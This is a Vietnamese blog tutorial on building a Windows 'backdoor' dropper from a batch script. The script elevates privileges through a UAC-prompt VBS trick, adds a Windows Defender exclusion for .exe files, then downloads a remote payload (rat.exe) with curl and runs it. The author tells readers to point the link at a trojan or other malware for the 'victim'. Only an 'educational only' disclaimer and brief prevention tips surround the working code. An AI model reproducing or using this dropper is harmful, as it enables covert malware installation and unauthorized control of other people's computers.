Như chúng ta đã biết, trong ngành an ninh mạng, Backdoor là một phần mềm độc hại nó bỏ qua các xác thực ở trong một hệ thống nào đó, truy cập trái phép. Không chỉ vậy, các hacker còn sử dụng nó để đánh cắp dữ liệu, tấn công mạng,… Và ngày hôm nay, mình sẽ hướng dẫn cho các bạn tạo một em Backdoor đơn giản chỉ với 1 tập lệnh Batch đơn giản nhé. Dành cho những bạn nào chưa biết về Backdoor thì hãy đọc bài viết này hoặc bạn có thể tìm hiểu tại đây. Được rồi chúng ta vào vấn đề chính thôi
Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục. Mọi hành vi phạm pháp Anonyviet sẽ không chịu toàn bộ trách nhiệm mà bạn đã gây ra
Cách tạo Backdoor đơn giản chỉ với một tập lệnh Batch
Để tạo được 1 Backdoor, trước tiên bạn hãy tạo một file có đuôi .bat sau đó copy đoạn code sau
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"=""
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
Powershell -Command "Set-MpPreference -ExclusionExtension exe"
cd %TEMP%
curl "paste link backdoor của bạn ở đây" -o rat.exe
rat.exe
Ở đoạn code trên, chúng ta cần thay đổi một chút ở dòng code thứ 2 từ dưới lên, các bạn hãy tạo một liên kết downloads trực tiếp về máy, hãy đảm bảo rằng liên kết đó phải chứa virus trojan, malware,… tùy bạn muốn, tiếp đến là hãy đặt tên backdoor mà bạn muốn tải về máy nạn nhân, mình để tên là rat.exe Như vậy chúng ta đã tạo xong Backdoor. Bây giờ mình sẽ giải thích cách thức hoạt động nhé
Cách hoạt động như sau:
Tập lệnh này cấp các đặc quyền của quản trị viên, sau đó tải xuống và thực thi một tệp có tên “rat.exe” từ một máy chủ từ xa.Trước tiên, mình đã sử dụng lệnh cacls để kiểm tra các quyền trên tệp hệ thống nằm ở “%SYSTEMROOT%\system32\config\system”. Nếu lệnh này lỗi, thì tập lệnh sẽ chuyển sang nhãn UACPrompt, nhãn này sẽ tạo tập lệnh VB (Visual Basic) để nhắc nạn nhân chạy tập lệnh với quyền quản trị viên. Nếu lệnh cacls không có lỗi thì tập lệnh sẽ nhảy tới nhãn gotAdmin và tiến hành thực thi phần còn lại. Chúng ta có thể thấy rằng, nhãn gotAdmin thay đổi thư mục chứa có chứa lệnh pushd và CD. Sau đó, nó sẽ chạy lệnh PowerShell để đặt tùy chọn cho các phần mở rộng loại trừ tệp thành exe. Cuối cùng, nó chuyển sang thư mục %TEMP% và sử dụng lệnh curl để tải xuống “rat.exe” từ một máy chủ từ xa. Tiếp đến nó sẽ chạy tệp đã tải xuống bằng lệnh rat.exe.
Như vậy, Backdoor này hoạt động rất đơn giản, nếu máy cài 2 Antivirus trở lên thì Backdoor này trở nên vô ích và nạn nhân sẽ phát hiện. Sau đây mình sẽ nói ra một số cách phòng chống Backdoor để mọi người cùng biết và né tránh
Cách phòng chống Backdoor
1.Xác minh nguồn gốc và tính xác thực của bất kì file hoặc chương trình trước khi chạy
2.Cập nhật các phiên bản phầm nềm chống Virus mới nhất
3.Không tải các phần mềm không rõ nguồn gốc
4.Sử dụng tường lửa
Bài viết đến đây là hết rồi, mình mong các bạn học được điều gì đó từ bài viết này. Chúc các bạn có một ngày thật tốt lành !
Bạn cũng có thể đọc thêm bài Villain – Bypass AntiVirus chiếm quyền shell Windows và Linux tai website Anonyviet.com
Câu hỏi thường gặp
Backdoor trong bài viết hoạt động như thế nào?
Backdoor này sử dụng tập lệnh batch để đạt quyền quản trị viên, sau đó tải và chạy một file thực thi (“rat.exe”) từ một máy chủ từ xa. Quá trình này bao gồm kiểm tra quyền, tự động nâng quyền nếu cần thiết, và vô hiệu hóa một số chức năng bảo mật.
Tôi có thể sử dụng backdoor này cho mục đích gì?
Bài viết này chỉ mang mục đích giáo dục. Việc sử dụng backdoor cho bất kỳ mục đích nào khác ngoài nghiên cứu an ninh mạng là bất hợp pháp và nguy hiểm. Chúng tôi không chịu trách nhiệm cho bất kỳ hậu quả nào phát sinh từ việc sử dụng mã nguồn này.
Làm thế nào để phòng tránh backdoor?
Cần xác minh nguồn gốc phần mềm trước khi cài đặt, cập nhật phần mềm diệt virus thường xuyên, tránh tải phần mềm từ nguồn không rõ ràng và sử dụng tường lửa để bảo vệ hệ thống.
hay